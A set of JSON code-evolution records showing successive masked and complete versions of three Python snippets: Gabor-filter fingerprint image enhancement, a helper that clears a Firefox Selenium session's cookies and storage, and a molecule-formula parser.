np.invert(enhanced_img)\n img = enhanced_img * 255\n base_image_name = os.path.splitext(os.path.basename(in_path))[0]\n prefix = 
base_image_name.split('_normal')[0]\n img_out = out_dir + prefix + '_enhanced.png'\n cv2.imwrite(img_out, img)\n return img_out\n",
"step-3": "<mask token>\n\n\ndef normalise(img):\n normed = (img - np.mean(img)) / np.std(img)\n return normed\n\n\ndef ridge_segment(im, blksze, thresh):\n rows, cols = im.shape\n im = normalise(im)\n new_rows = np.int(blksze * np.ceil(rows / blksze))\n new_cols = np.int(blksze * np.ceil(cols / blksze))\n padded_img = np.zeros((new_rows, new_cols))\n stddevim = np.zeros((new_rows, new_cols))\n padded_img[0:rows][:, 0:cols] = im\n for i in range(0, new_rows, blksze):\n for j in range(0, new_cols, blksze):\n block = padded_img[i:i + blksze][:, j:j + blksze]\n stddevim[i:i + blksze][:, j:j + blksze] = np.std(block) * np.ones(\n block.shape)\n stddevim = stddevim[0:rows][:, 0:cols]\n mask = stddevim > thresh\n mean_val = np.mean(im[mask])\n std_val = np.std(im[mask])\n normim = (im - mean_val) / std_val\n return normim, mask\n\n\ndef ridge_orient(im, gradientsigma, blocksigma, orientsmoothsigma):\n sze = np.fix(6 * gradientsigma)\n if np.remainder(sze, 2) == 0:\n sze = sze + 1\n gauss = cv2.getGaussianKernel(np.int(sze), gradientsigma)\n f = gauss * gauss.T\n fy, fx = np.gradient(f)\n Gx = signal.convolve2d(im, fx, mode='same')\n Gy = signal.convolve2d(im, fy, mode='same')\n Gxx = np.power(Gx, 2)\n Gyy = np.power(Gy, 2)\n Gxy = Gx * Gy\n sze = np.fix(6 * blocksigma)\n gauss = cv2.getGaussianKernel(np.int(sze), blocksigma)\n f = gauss * gauss.T\n Gxx = scipy.ndimage.convolve(Gxx, f)\n Gyy = scipy.ndimage.convolve(Gyy, f)\n Gxy = 2 * scipy.ndimage.convolve(Gxy, f)\n denom = np.sqrt(np.power(Gxy, 2) + np.power(Gxx - Gyy, 2)) + np.finfo(float\n ).eps\n sin2theta = Gxy / denom\n cos2theta = (Gxx - Gyy) / denom\n if orientsmoothsigma:\n sze = np.fix(6 * orientsmoothsigma)\n if np.remainder(sze, 2) == 0:\n sze = sze + 1\n gauss = cv2.getGaussianKernel(np.int(sze), orientsmoothsigma)\n f = gauss * gauss.T\n cos2theta = scipy.ndimage.convolve(cos2theta, f)\n sin2theta = scipy.ndimage.convolve(sin2theta, f)\n orientim = np.pi / 2 + np.arctan2(sin2theta, cos2theta) / 2\n return 
orientim\n\n\ndef frequest(im, orientim, windsze, minWaveLength, maxWaveLength):\n rows, cols = np.shape(im)\n cosorient = np.mean(np.cos(2 * orientim))\n sinorient = np.mean(np.sin(2 * orientim))\n orient = math.atan2(sinorient, cosorient) / 2\n rotim = scipy.ndimage.rotate(im, orient / np.pi * 180 + 90, axes=(1, 0),\n reshape=False, order=3, mode='nearest')\n cropsze = int(np.fix(rows / np.sqrt(2)))\n offset = int(np.fix((rows - cropsze) / 2))\n rotim = rotim[offset:offset + cropsze][:, offset:offset + cropsze]\n proj = np.sum(rotim, axis=0)\n dilation = scipy.ndimage.grey_dilation(proj, windsze, structure=np.ones\n (windsze))\n temp = np.abs(dilation - proj)\n peak_thresh = 2\n maxpts = (temp < peak_thresh) & (proj > np.mean(proj))\n maxind = np.where(maxpts)\n rows_maxind, cols_maxind = np.shape(maxind)\n if cols_maxind < 2:\n freqim = np.zeros(im.shape)\n else:\n NoOfPeaks = cols_maxind\n waveLength = (maxind[0][cols_maxind - 1] - maxind[0][0]) / (NoOfPeaks -\n 1)\n if waveLength >= minWaveLength and waveLength <= maxWaveLength:\n freqim = 1 / np.double(waveLength) * np.ones(im.shape)\n else:\n freqim = np.zeros(im.shape)\n return freqim\n\n\ndef ridge_freq(im, mask, orient, blksze, windsze, minWaveLength, maxWaveLength\n ):\n rows, cols = im.shape\n freq = np.zeros((rows, cols))\n for r in range(0, rows - blksze, blksze):\n for c in range(0, cols - blksze, blksze):\n blkim = im[r:r + blksze][:, c:c + blksze]\n blkor = orient[r:r + blksze][:, c:c + blksze]\n freq[r:r + blksze][:, c:c + blksze] = frequest(blkim, blkor,\n windsze, minWaveLength, maxWaveLength)\n freq = freq * mask\n freq_1d = np.reshape(freq, (1, rows * cols))\n ind = np.where(freq_1d > 0)\n ind = np.array(ind)\n ind = ind[1, :]\n non_zero_elems_in_freq = freq_1d[0][ind]\n meanfreq = np.mean(non_zero_elems_in_freq)\n medianfreq = np.median(non_zero_elems_in_freq)\n return freq, meanfreq\n\n\ndef ridge_filter(im, orient, freq, kx, ky):\n angleInc = 3\n im = np.double(im)\n rows, cols = im.shape\n 
new_im = np.zeros((rows, cols))\n freq_1d = np.reshape(freq, (1, rows * cols))\n ind = np.where(freq_1d > 0)\n ind = np.array(ind)\n ind = ind[1, :]\n non_zero_elems_in_freq = freq_1d[0][ind]\n non_zero_elems_in_freq = np.double(np.round(non_zero_elems_in_freq * 100)\n ) / 100\n unfreq = np.unique(non_zero_elems_in_freq)\n sigmax = 1 / unfreq[0] * kx\n sigmay = 1 / unfreq[0] * ky\n sze = np.round(3 * np.max([sigmax, sigmay]))\n x, y = np.meshgrid(np.linspace(-sze, sze, 2 * sze + 1), np.linspace(-\n sze, sze, 2 * sze + 1))\n reffilter = np.exp(-(np.power(x, 2) / (sigmax * sigmax) + np.power(y, 2\n ) / (sigmay * sigmay))) * np.cos(2 * np.pi * unfreq[0] * x)\n filt_rows, filt_cols = reffilter.shape\n gabor_filter = np.array(np.zeros((180 // angleInc, filt_rows, filt_cols)))\n for o in range(0, 180 // angleInc):\n rot_filt = scipy.ndimage.rotate(reffilter, -(o * angleInc + 90),\n reshape=False)\n gabor_filter[o] = rot_filt\n maxsze = int(sze)\n temp = freq > 0\n validr, validc = np.where(temp)\n temp1 = validr > maxsze\n temp2 = validr < rows - maxsze\n temp3 = validc > maxsze\n temp4 = validc < cols - maxsze\n final_temp = temp1 & temp2 & temp3 & temp4\n finalind = np.where(final_temp)\n maxorient_index = np.round(180 / angleInc)\n orient_index = np.round(orient / np.pi * 180 / angleInc)\n for i in range(0, rows):\n for j in range(0, cols):\n if orient_index[i][j] < 1:\n orient_index[i][j] = orient_index[i][j] + maxorient_index\n if orient_index[i][j] > maxorient_index:\n orient_index[i][j] = orient_index[i][j] - maxorient_index\n finalind_rows, finalind_cols = np.shape(finalind)\n sze = int(sze)\n for k in range(0, finalind_cols):\n r = validr[finalind[0][k]]\n c = validc[finalind[0][k]]\n img_block = im[r - sze:r + sze + 1][:, c - sze:c + sze + 1]\n new_im[r][c] = np.sum(img_block * gabor_filter[int(orient_index[r][\n c]) - 1])\n return new_im\n\n\ndef image_enhance(img):\n blksze = 16\n thresh = 0.1\n normim, mask = ridge_segment(img, blksze, thresh)\n 
gradientsigma = 1\n blocksigma = 7\n orientsmoothsigma = 7\n orientim = ridge_orient(normim, gradientsigma, blocksigma,\n orientsmoothsigma)\n blksze = 38\n windsze = 5\n min_wave_length = 5\n max_wave_length = 15\n freq, medfreq = ridge_freq(normim, mask, orientim, blksze, windsze,\n min_wave_length, max_wave_length)\n freq = medfreq * mask\n kx = ky = 0.65\n new_im = ridge_filter(normim, orientim, freq, kx, ky)\n return new_im < -3\n\n\ndef gabor_enhance(in_path, out_dir='./'):\n img = cv2.imread(in_path, 0)\n enhanced_img = image_enhance(img)\n enhanced_img = np.invert(enhanced_img)\n img = enhanced_img * 255\n base_image_name = os.path.splitext(os.path.basename(in_path))[0]\n prefix = base_image_name.split('_normal')[0]\n img_out = out_dir + prefix + '_enhanced.png'\n cv2.imwrite(img_out, img)\n return img_out\n",
"step-4": "<mask token>\nimport os\nimport cv2\nimport math\nimport scipy\nimport numpy as np\nfrom scipy import signal\n\n\ndef normalise(img):\n normed = (img - np.mean(img)) / np.std(img)\n return normed\n\n\ndef ridge_segment(im, blksze, thresh):\n rows, cols = im.shape\n im = normalise(im)\n new_rows = np.int(blksze * np.ceil(rows / blksze))\n new_cols = np.int(blksze * np.ceil(cols / blksze))\n padded_img = np.zeros((new_rows, new_cols))\n stddevim = np.zeros((new_rows, new_cols))\n padded_img[0:rows][:, 0:cols] = im\n for i in range(0, new_rows, blksze):\n for j in range(0, new_cols, blksze):\n block = padded_img[i:i + blksze][:, j:j + blksze]\n stddevim[i:i + blksze][:, j:j + blksze] = np.std(block) * np.ones(\n block.shape)\n stddevim = stddevim[0:rows][:, 0:cols]\n mask = stddevim > thresh\n mean_val = np.mean(im[mask])\n std_val = np.std(im[mask])\n normim = (im - mean_val) / std_val\n return normim, mask\n\n\ndef ridge_orient(im, gradientsigma, blocksigma, orientsmoothsigma):\n sze = np.fix(6 * gradientsigma)\n if np.remainder(sze, 2) == 0:\n sze = sze + 1\n gauss = cv2.getGaussianKernel(np.int(sze), gradientsigma)\n f = gauss * gauss.T\n fy, fx = np.gradient(f)\n Gx = signal.convolve2d(im, fx, mode='same')\n Gy = signal.convolve2d(im, fy, mode='same')\n Gxx = np.power(Gx, 2)\n Gyy = np.power(Gy, 2)\n Gxy = Gx * Gy\n sze = np.fix(6 * blocksigma)\n gauss = cv2.getGaussianKernel(np.int(sze), blocksigma)\n f = gauss * gauss.T\n Gxx = scipy.ndimage.convolve(Gxx, f)\n Gyy = scipy.ndimage.convolve(Gyy, f)\n Gxy = 2 * scipy.ndimage.convolve(Gxy, f)\n denom = np.sqrt(np.power(Gxy, 2) + np.power(Gxx - Gyy, 2)) + np.finfo(float\n ).eps\n sin2theta = Gxy / denom\n cos2theta = (Gxx - Gyy) / denom\n if orientsmoothsigma:\n sze = np.fix(6 * orientsmoothsigma)\n if np.remainder(sze, 2) == 0:\n sze = sze + 1\n gauss = cv2.getGaussianKernel(np.int(sze), orientsmoothsigma)\n f = gauss * gauss.T\n cos2theta = scipy.ndimage.convolve(cos2theta, f)\n sin2theta = 
scipy.ndimage.convolve(sin2theta, f)\n orientim = np.pi / 2 + np.arctan2(sin2theta, cos2theta) / 2\n return orientim\n\n\ndef frequest(im, orientim, windsze, minWaveLength, maxWaveLength):\n rows, cols = np.shape(im)\n cosorient = np.mean(np.cos(2 * orientim))\n sinorient = np.mean(np.sin(2 * orientim))\n orient = math.atan2(sinorient, cosorient) / 2\n rotim = scipy.ndimage.rotate(im, orient / np.pi * 180 + 90, axes=(1, 0),\n reshape=False, order=3, mode='nearest')\n cropsze = int(np.fix(rows / np.sqrt(2)))\n offset = int(np.fix((rows - cropsze) / 2))\n rotim = rotim[offset:offset + cropsze][:, offset:offset + cropsze]\n proj = np.sum(rotim, axis=0)\n dilation = scipy.ndimage.grey_dilation(proj, windsze, structure=np.ones\n (windsze))\n temp = np.abs(dilation - proj)\n peak_thresh = 2\n maxpts = (temp < peak_thresh) & (proj > np.mean(proj))\n maxind = np.where(maxpts)\n rows_maxind, cols_maxind = np.shape(maxind)\n if cols_maxind < 2:\n freqim = np.zeros(im.shape)\n else:\n NoOfPeaks = cols_maxind\n waveLength = (maxind[0][cols_maxind - 1] - maxind[0][0]) / (NoOfPeaks -\n 1)\n if waveLength >= minWaveLength and waveLength <= maxWaveLength:\n freqim = 1 / np.double(waveLength) * np.ones(im.shape)\n else:\n freqim = np.zeros(im.shape)\n return freqim\n\n\ndef ridge_freq(im, mask, orient, blksze, windsze, minWaveLength, maxWaveLength\n ):\n rows, cols = im.shape\n freq = np.zeros((rows, cols))\n for r in range(0, rows - blksze, blksze):\n for c in range(0, cols - blksze, blksze):\n blkim = im[r:r + blksze][:, c:c + blksze]\n blkor = orient[r:r + blksze][:, c:c + blksze]\n freq[r:r + blksze][:, c:c + blksze] = frequest(blkim, blkor,\n windsze, minWaveLength, maxWaveLength)\n freq = freq * mask\n freq_1d = np.reshape(freq, (1, rows * cols))\n ind = np.where(freq_1d > 0)\n ind = np.array(ind)\n ind = ind[1, :]\n non_zero_elems_in_freq = freq_1d[0][ind]\n meanfreq = np.mean(non_zero_elems_in_freq)\n medianfreq = np.median(non_zero_elems_in_freq)\n return freq, 
meanfreq\n\n\ndef ridge_filter(im, orient, freq, kx, ky):\n angleInc = 3\n im = np.double(im)\n rows, cols = im.shape\n new_im = np.zeros((rows, cols))\n freq_1d = np.reshape(freq, (1, rows * cols))\n ind = np.where(freq_1d > 0)\n ind = np.array(ind)\n ind = ind[1, :]\n non_zero_elems_in_freq = freq_1d[0][ind]\n non_zero_elems_in_freq = np.double(np.round(non_zero_elems_in_freq * 100)\n ) / 100\n unfreq = np.unique(non_zero_elems_in_freq)\n sigmax = 1 / unfreq[0] * kx\n sigmay = 1 / unfreq[0] * ky\n sze = np.round(3 * np.max([sigmax, sigmay]))\n x, y = np.meshgrid(np.linspace(-sze, sze, 2 * sze + 1), np.linspace(-\n sze, sze, 2 * sze + 1))\n reffilter = np.exp(-(np.power(x, 2) / (sigmax * sigmax) + np.power(y, 2\n ) / (sigmay * sigmay))) * np.cos(2 * np.pi * unfreq[0] * x)\n filt_rows, filt_cols = reffilter.shape\n gabor_filter = np.array(np.zeros((180 // angleInc, filt_rows, filt_cols)))\n for o in range(0, 180 // angleInc):\n rot_filt = scipy.ndimage.rotate(reffilter, -(o * angleInc + 90),\n reshape=False)\n gabor_filter[o] = rot_filt\n maxsze = int(sze)\n temp = freq > 0\n validr, validc = np.where(temp)\n temp1 = validr > maxsze\n temp2 = validr < rows - maxsze\n temp3 = validc > maxsze\n temp4 = validc < cols - maxsze\n final_temp = temp1 & temp2 & temp3 & temp4\n finalind = np.where(final_temp)\n maxorient_index = np.round(180 / angleInc)\n orient_index = np.round(orient / np.pi * 180 / angleInc)\n for i in range(0, rows):\n for j in range(0, cols):\n if orient_index[i][j] < 1:\n orient_index[i][j] = orient_index[i][j] + maxorient_index\n if orient_index[i][j] > maxorient_index:\n orient_index[i][j] = orient_index[i][j] - maxorient_index\n finalind_rows, finalind_cols = np.shape(finalind)\n sze = int(sze)\n for k in range(0, finalind_cols):\n r = validr[finalind[0][k]]\n c = validc[finalind[0][k]]\n img_block = im[r - sze:r + sze + 1][:, c - sze:c + sze + 1]\n new_im[r][c] = np.sum(img_block * gabor_filter[int(orient_index[r][\n c]) - 1])\n return 
new_im\n\n\ndef image_enhance(img):\n blksze = 16\n thresh = 0.1\n normim, mask = ridge_segment(img, blksze, thresh)\n gradientsigma = 1\n blocksigma = 7\n orientsmoothsigma = 7\n orientim = ridge_orient(normim, gradientsigma, blocksigma,\n orientsmoothsigma)\n blksze = 38\n windsze = 5\n min_wave_length = 5\n max_wave_length = 15\n freq, medfreq = ridge_freq(normim, mask, orientim, blksze, windsze,\n min_wave_length, max_wave_length)\n freq = medfreq * mask\n kx = ky = 0.65\n new_im = ridge_filter(normim, orientim, freq, kx, ky)\n return new_im < -3\n\n\ndef gabor_enhance(in_path, out_dir='./'):\n img = cv2.imread(in_path, 0)\n enhanced_img = image_enhance(img)\n enhanced_img = np.invert(enhanced_img)\n img = enhanced_img * 255\n base_image_name = os.path.splitext(os.path.basename(in_path))[0]\n prefix = base_image_name.split('_normal')[0]\n img_out = out_dir + prefix + '_enhanced.png'\n cv2.imwrite(img_out, img)\n return img_out\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\npython3\ndescription :Fingerprint image enhancement by using gabor\n\"\"\"\nimport os\nimport cv2\nimport math\nimport scipy\nimport numpy as np\nfrom scipy import signal\n\n\ndef normalise(img):\n normed = (img - np.mean(img)) / (np.std(img))\n return normed\n\n\ndef ridge_segment(im, blksze, thresh):\n rows, cols = im.shape\n im = normalise(im)\n new_rows = np.int(blksze * np.ceil(rows / blksze))\n new_cols = np.int(blksze * np.ceil(cols / blksze))\n\n padded_img = np.zeros((new_rows, new_cols))\n stddevim = np.zeros((new_rows, new_cols))\n\n padded_img[0:rows][:, 0:cols] = im\n\n for i in range(0, new_rows, blksze):\n for j in range(0, new_cols, blksze):\n block = padded_img[i:i + blksze][:, j:j + blksze]\n\n stddevim[i:i + blksze][:, j:j +\n blksze] = np.std(block) * np.ones(block.shape)\n\n stddevim = stddevim[0:rows][:, 0:cols]\n\n mask = stddevim > thresh\n\n mean_val = np.mean(im[mask])\n\n std_val = np.std(im[mask])\n\n normim = (im - mean_val) / (std_val)\n\n return (normim, mask)\n\n\ndef ridge_orient(im, gradientsigma, blocksigma, orientsmoothsigma):\n # Calculate image gradients.\n sze = np.fix(6 * gradientsigma)\n if np.remainder(sze, 2) == 0:\n sze = sze + 1\n\n gauss = cv2.getGaussianKernel(np.int(sze), gradientsigma)\n f = gauss * gauss.T\n\n fy, fx = np.gradient(f) # Gradient of Gaussian\n Gx = signal.convolve2d(im, fx, mode='same')\n Gy = signal.convolve2d(im, fy, mode='same')\n\n Gxx = np.power(Gx, 2)\n Gyy = np.power(Gy, 2)\n Gxy = Gx * Gy\n\n # Now smooth the covariance data to perform a weighted summation of the data.\n\n sze = np.fix(6 * blocksigma)\n\n gauss = cv2.getGaussianKernel(np.int(sze), blocksigma)\n f = gauss * gauss.T\n\n Gxx = scipy.ndimage.convolve(Gxx, f)\n Gyy = scipy.ndimage.convolve(Gyy, f)\n Gxy = 2 * scipy.ndimage.convolve(Gxy, f)\n\n # Analytic solution of principal direction\n denom = np.sqrt(np.power(Gxy, 2) + np.power((Gxx - Gyy), 2)\n ) + np.finfo(float).eps\n\n sin2theta = 
Gxy / denom # Sine and cosine of doubled angles\n cos2theta = (Gxx - Gyy) / denom\n\n if orientsmoothsigma:\n sze = np.fix(6 * orientsmoothsigma)\n if np.remainder(sze, 2) == 0:\n sze = sze + 1\n gauss = cv2.getGaussianKernel(np.int(sze), orientsmoothsigma)\n f = gauss * gauss.T\n # Smoothed sine and cosine of\n cos2theta = scipy.ndimage.convolve(cos2theta, f)\n sin2theta = scipy.ndimage.convolve(sin2theta, f) # doubled angles\n\n orientim = np.pi / 2 + np.arctan2(sin2theta, cos2theta) / 2\n return (orientim)\n\n\ndef frequest(im, orientim, windsze, minWaveLength, maxWaveLength):\n rows, cols = np.shape(im)\n\n # Find mean orientation within the block. This is done by averaging the\n # sines and cosines of the doubled angles before reconstructing the\n # angle again. This avoids wraparound problems at the origin.\n\n cosorient = np.mean(np.cos(2 * orientim))\n sinorient = np.mean(np.sin(2 * orientim))\n orient = math.atan2(sinorient, cosorient) / 2\n\n # Rotate the image block so that the ridges are vertical\n\n # ROT_mat = cv2.getRotationMatrix2D((cols/2,rows/2),orient/np.pi*180 + 90,1)\n # rotim = cv2.warpAffine(im,ROT_mat,(cols,rows))\n rotim = scipy.ndimage.rotate(\n im, orient / np.pi * 180 + 90, axes=(1, 0), reshape=False, order=3, mode='nearest')\n\n # Now crop the image so that the rotated image does not contain any\n # invalid regions. 
This prevents the projection down the columns\n # from being mucked up.\n\n cropsze = int(np.fix(rows / np.sqrt(2)))\n offset = int(np.fix((rows - cropsze) / 2))\n rotim = rotim[offset:offset + cropsze][:, offset:offset + cropsze]\n\n # Sum down the columns to get a projection of the grey values down\n # the ridges.\n\n proj = np.sum(rotim, axis=0)\n dilation = scipy.ndimage.grey_dilation(\n proj, windsze, structure=np.ones(windsze))\n\n temp = np.abs(dilation - proj)\n\n peak_thresh = 2\n\n maxpts = (temp < peak_thresh) & (proj > np.mean(proj))\n maxind = np.where(maxpts)\n\n rows_maxind, cols_maxind = np.shape(maxind)\n\n # Determine the spatial frequency of the ridges by divinding the\n # distance between the 1st and last peaks by the (No of peaks-1). If no\n # peaks are detected, or the wavelength is outside the allowed bounds,\n # the frequency image is set to 0\n\n if cols_maxind < 2:\n freqim = np.zeros(im.shape)\n else:\n NoOfPeaks = cols_maxind\n waveLength = (maxind[0][cols_maxind - 1] - maxind[0][0]) / (NoOfPeaks - 1)\n if waveLength >= minWaveLength and waveLength <= maxWaveLength:\n freqim = 1 / np.double(waveLength) * np.ones(im.shape)\n else:\n freqim = np.zeros(im.shape)\n\n return freqim\n\n\ndef ridge_freq(im, mask, orient, blksze, windsze, minWaveLength, maxWaveLength):\n rows, cols = im.shape\n freq = np.zeros((rows, cols))\n\n for r in range(0, rows - blksze, blksze):\n for c in range(0, cols - blksze, blksze):\n blkim = im[r:r + blksze][:, c:c + blksze]\n blkor = orient[r:r + blksze][:, c:c + blksze]\n\n freq[r:r + blksze][:, c:c +\n blksze] = frequest(blkim, blkor, windsze, minWaveLength, maxWaveLength)\n\n freq = freq * mask\n freq_1d = np.reshape(freq, (1, rows * cols))\n ind = np.where(freq_1d > 0)\n\n ind = np.array(ind)\n ind = ind[1, :]\n\n non_zero_elems_in_freq = freq_1d[0][ind]\n\n meanfreq = np.mean(non_zero_elems_in_freq)\n # does not work properly\n medianfreq = np.median(non_zero_elems_in_freq)\n return freq, meanfreq\n\n\ndef 
ridge_filter(im, orient, freq, kx, ky):\n angleInc = 3\n im = np.double(im)\n rows, cols = im.shape\n new_im = np.zeros((rows, cols))\n\n freq_1d = np.reshape(freq, (1, rows * cols))\n ind = np.where(freq_1d > 0)\n\n ind = np.array(ind)\n ind = ind[1, :]\n\n # Round the array of frequencies to the nearest 0.01 to reduce the\n # number of distinct frequencies we have to deal with.\n\n non_zero_elems_in_freq = freq_1d[0][ind]\n non_zero_elems_in_freq = np.double(\n np.round((non_zero_elems_in_freq * 100))) / 100\n\n unfreq = np.unique(non_zero_elems_in_freq)\n\n # Generate filters corresponding to these distinct frequencies and\n # orientations in 'angleInc' increments.\n\n sigmax = 1 / unfreq[0] * kx\n sigmay = 1 / unfreq[0] * ky\n\n sze = np.round(3 * np.max([sigmax, sigmay]))\n\n x, y = np.meshgrid(np.linspace(-sze, sze, (2 * sze + 1)),\n np.linspace(-sze, sze, (2 * sze + 1)))\n\n reffilter = np.exp(-((np.power(x, 2)) / (sigmax * sigmax) + (np.power(y, 2)) / (sigmay * sigmay))\n ) * np.cos(2 * np.pi * unfreq[0] * x) # this is the original gabor filter\n\n filt_rows, filt_cols = reffilter.shape\n\n gabor_filter = np.array(np.zeros((180 // angleInc, filt_rows, filt_cols)))\n\n for o in range(0, 180 // angleInc):\n # Generate rotated versions of the filter. 
Note orientation\n # image provides orientation *along* the ridges, hence +90\n # degrees, and imrotate requires angles +ve anticlockwise, hence\n # the minus sign.\n\n rot_filt = scipy.ndimage.rotate(reffilter, -(o * angleInc + 90), reshape=False)\n gabor_filter[o] = rot_filt\n\n # Find indices of matrix points greater than maxsze from the image\n # boundary\n\n maxsze = int(sze)\n\n temp = freq > 0\n validr, validc = np.where(temp)\n\n temp1 = validr > maxsze\n temp2 = validr < rows - maxsze\n temp3 = validc > maxsze\n temp4 = validc < cols - maxsze\n\n final_temp = temp1 & temp2 & temp3 & temp4\n\n finalind = np.where(final_temp)\n\n # Convert orientation matrix values from radians to an index value\n # that corresponds to round(degrees/angleInc)\n\n maxorient_index = np.round(180 / angleInc)\n orient_index = np.round(orient / np.pi * 180 / angleInc)\n\n # do the filtering\n\n for i in range(0, rows):\n for j in range(0, cols):\n if orient_index[i][j] < 1:\n orient_index[i][j] = orient_index[i][j] + maxorient_index\n if orient_index[i][j] > maxorient_index:\n orient_index[i][j] = orient_index[i][j] - maxorient_index\n finalind_rows, finalind_cols = np.shape(finalind)\n sze = int(sze)\n for k in range(0, finalind_cols):\n r = validr[finalind[0][k]]\n c = validc[finalind[0][k]]\n\n img_block = im[r - sze:r + sze + 1][:, c - sze:c + sze + 1]\n\n new_im[r][c] = np.sum(\n img_block * gabor_filter[int(orient_index[r][c]) - 1])\n\n return new_im\n\n\ndef image_enhance(img):\n blksze = 16\n thresh = 0.1\n # normalise the image and find a ROI\n normim, mask = ridge_segment(img, blksze, thresh)\n\n gradientsigma = 1\n blocksigma = 7\n orientsmoothsigma = 7\n # find orientation of every pixel\n orientim = ridge_orient(normim, gradientsigma,\n blocksigma, orientsmoothsigma)\n\n blksze = 38\n windsze = 5\n min_wave_length = 5\n max_wave_length = 15\n # find the overall frequency of ridges\n freq, medfreq = ridge_freq(\n normim, mask, orientim, blksze, windsze, 
min_wave_length, max_wave_length)\n\n freq = medfreq * mask\n kx = ky = 0.65\n # create gabor filter and do the actual filtering\n new_im = ridge_filter(normim, orientim, freq, kx, ky)\n\n return (new_im < -3)\n\n\ndef gabor_enhance(in_path, out_dir='./'):\n img = cv2.imread(in_path, 0)\n enhanced_img = image_enhance(img)\n enhanced_img = np.invert(enhanced_img)\n # print('saving the image')\n img = enhanced_img * 255\n base_image_name = os.path.splitext(os.path.basename(in_path))[0]\n prefix = base_image_name.split('_normal')[0]\n img_out = out_dir + prefix + '_enhanced.png'\n # img.save(base_image_name + \"_enhanced.png\", \"PNG\")\n cv2.imwrite(img_out, img)\n return img_out\n\n\n",
"step-ids": [
5,
7,
8,
9,
10
]
}
|
[
5,
7,
8,
9,
10
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class LocationNotSet(Exception):
pass
<|reserved_special_token_1|>
def clear_firefox_driver_session(firefox_driver):
firefox_driver.delete_all_cookies()
firefox_driver.execute_script('window.localStorage.clear();')
firefox_driver.execute_script('window.sessionStorage.clear();')
class LocationNotSet(Exception):
pass
<|reserved_special_token_1|>
def clear_firefox_driver_session(firefox_driver):
    """Wipe all cookies plus the local and session storage of *firefox_driver*."""
    firefox_driver.delete_all_cookies()
    # Clearing web storage only works once the browser has navigated to a
    # location; before that the scripts below fail.
    for storage in ('localStorage', 'sessionStorage'):
        firefox_driver.execute_script('window.' + storage + '.clear();')


class LocationNotSet(Exception):
    """Raised when the browser has not been pointed at any location yet."""
|
flexible
|
{
"blob_id": "6d0b9523668bd0b302fdbc196d3d7ff25be10b23",
"index": 5045,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass LocationNotSet(Exception):\n pass\n",
"step-3": "def clear_firefox_driver_session(firefox_driver):\n firefox_driver.delete_all_cookies()\n firefox_driver.execute_script('window.localStorage.clear();')\n firefox_driver.execute_script('window.sessionStorage.clear();')\n\n\nclass LocationNotSet(Exception):\n pass\n",
"step-4": "def clear_firefox_driver_session(firefox_driver):\n firefox_driver.delete_all_cookies()\n # Note this only works if the browser is set to a location.\n firefox_driver.execute_script('window.localStorage.clear();')\n firefox_driver.execute_script('window.sessionStorage.clear();')\n\n\nclass LocationNotSet(Exception):\n pass\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import re
def molecule_to_list(molecule: str) -> list:
    """Splits up a molecule into elements and amount in order of appearance

    Args:
        molecule (str): The molecule to split up

    Raises:
        ValueError: If molecule is empty or starts with a lower case letter
        ValueError: If molecule contains a non-alphanumeric character
        ValueError: If an element starts with a lower case letter

    Returns:
        list: A list of tuples containing the element symbol and the number of
        its appearances at that position
    """
    # Guard against the empty string, which previously raised IndexError.
    if not molecule or molecule[0].islower():
        raise ValueError
    # Accept ASCII letters and digits only.  The previous check used \w,
    # which wrongly accepted underscores.
    if re.match(r"^[A-Za-z0-9]+$", molecule) is None:
        raise ValueError
    result = []
    # An element is an upper-case letter plus optional lower-case letter;
    # runs of lower-case letters are also captured so they can be rejected
    # below.  \d+ (previously \d{1,2}) keeps counts of 100 or more intact
    # instead of silently truncating them.
    elements = re.findall(r"([A-Z][a-z]?|[a-z]{1,2})(\d+)?", molecule)
    for symbol, count in elements:
        if symbol[0].islower():
            raise ValueError
        # findall yields '' when the optional count group did not match.
        result.append((symbol, int(count) if count else 1))
    return result
|
normal
|
{
"blob_id": "a14a1803a0bae755803c471b12035398de262dbc",
"index": 9138,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef molecule_to_list(molecule: str) ->list:\n \"\"\"Splits up a molucule into elements and amount in order of appearance\n\n Args:\n molecule (str): The molecule to split up\n\n Raises:\n ValueError: If molecule starts with a lower case letter\n ValueError: If molecule contains a non-alphanumeric character\n ValueError: If an element starts with a lower case letter\n\n Returns:\n list: A list of tuples containing the element symbol and the number of\n its appearances at that position\n \"\"\"\n if molecule[0].islower():\n raise ValueError\n if re.match('^[\\\\w]+$', molecule) is None:\n raise ValueError\n result = []\n elements = re.findall('([A-Z][a-z]?|[a-z]{1,2})(\\\\d{1,2})?', molecule)\n for element in elements:\n if element[0].islower():\n raise ValueError\n if element[1] == '':\n result.append((element[0], 1))\n else:\n result.append((element[0], int(element[1])))\n return result\n",
"step-3": "import re\n\n\ndef molecule_to_list(molecule: str) ->list:\n \"\"\"Splits up a molucule into elements and amount in order of appearance\n\n Args:\n molecule (str): The molecule to split up\n\n Raises:\n ValueError: If molecule starts with a lower case letter\n ValueError: If molecule contains a non-alphanumeric character\n ValueError: If an element starts with a lower case letter\n\n Returns:\n list: A list of tuples containing the element symbol and the number of\n its appearances at that position\n \"\"\"\n if molecule[0].islower():\n raise ValueError\n if re.match('^[\\\\w]+$', molecule) is None:\n raise ValueError\n result = []\n elements = re.findall('([A-Z][a-z]?|[a-z]{1,2})(\\\\d{1,2})?', molecule)\n for element in elements:\n if element[0].islower():\n raise ValueError\n if element[1] == '':\n result.append((element[0], 1))\n else:\n result.append((element[0], int(element[1])))\n return result\n",
"step-4": "import re\n\n\ndef molecule_to_list(molecule: str) -> list:\n \"\"\"Splits up a molucule into elements and amount in order of appearance\n\n Args:\n molecule (str): The molecule to split up\n\n Raises:\n ValueError: If molecule starts with a lower case letter\n ValueError: If molecule contains a non-alphanumeric character\n ValueError: If an element starts with a lower case letter\n\n Returns:\n list: A list of tuples containing the element symbol and the number of\n its appearances at that position\n \"\"\"\n if molecule[0].islower():\n raise ValueError\n # Test if molecule contains non-alphanumeric characters\n if re.match(r\"^[\\w]+$\", molecule) is None:\n raise ValueError\n result = []\n # Split molecule into elements and amounts\n elements = re.findall(r\"([A-Z][a-z]?|[a-z]{1,2})(\\d{1,2})?\", molecule)\n for element in elements:\n if element[0].islower():\n raise ValueError\n # Ensure the result has a numerical value\n if element[1] == '':\n 